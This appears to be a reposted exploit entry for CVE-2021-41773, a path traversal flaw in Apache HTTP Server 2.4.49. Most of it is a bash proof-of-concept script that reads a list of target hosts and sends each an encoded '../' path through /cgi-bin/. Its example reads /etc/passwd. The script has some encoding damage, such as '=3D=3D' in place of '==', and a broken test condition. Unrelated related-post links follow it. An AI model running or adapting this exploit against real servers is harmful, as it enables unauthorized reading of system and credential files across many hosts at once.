Apache HTTP Server version 2.4.49 suffers from a path traversal vulnerability.
advisories | CVE-2021-41773
# Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal
# Date: 10/05/2021
# Exploit Author: Lucas Souza https://lsass.io
# Vendor Homepage: https://apache.org/
# Version: 2.4.49
# Tested on: 2.4.49
# CVE : CVE-2021-41773
# Credits: Ash Daulton and the cPanel Security Team#!/bin/bash
if [[ $1 =3D=3D '' ]]; [[ $2 =3D=3D '' ]]; then
echo Set [TAGET-LIST.TXT] [PATH]
echo ./PoC.sh targets.txt /etc/passwd
exit
fi
for host in $(cat $1); do
curl --silent --path-as-is --insecure "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done
Related posts:
North Korean Kimsuky Hackers Strike Again with Advanced Reconnaissance Malware
Bank of the West found debit card-stealing skimmers on ATMs
Addressing the Particular Cybersecurity Challenge of Discrete Manufacturing
Judge denies Trump's motion for mistrial in battery case
Analysis and Config Extraction of Lu0Bot, a Node.js Malware with Considerable Capabilities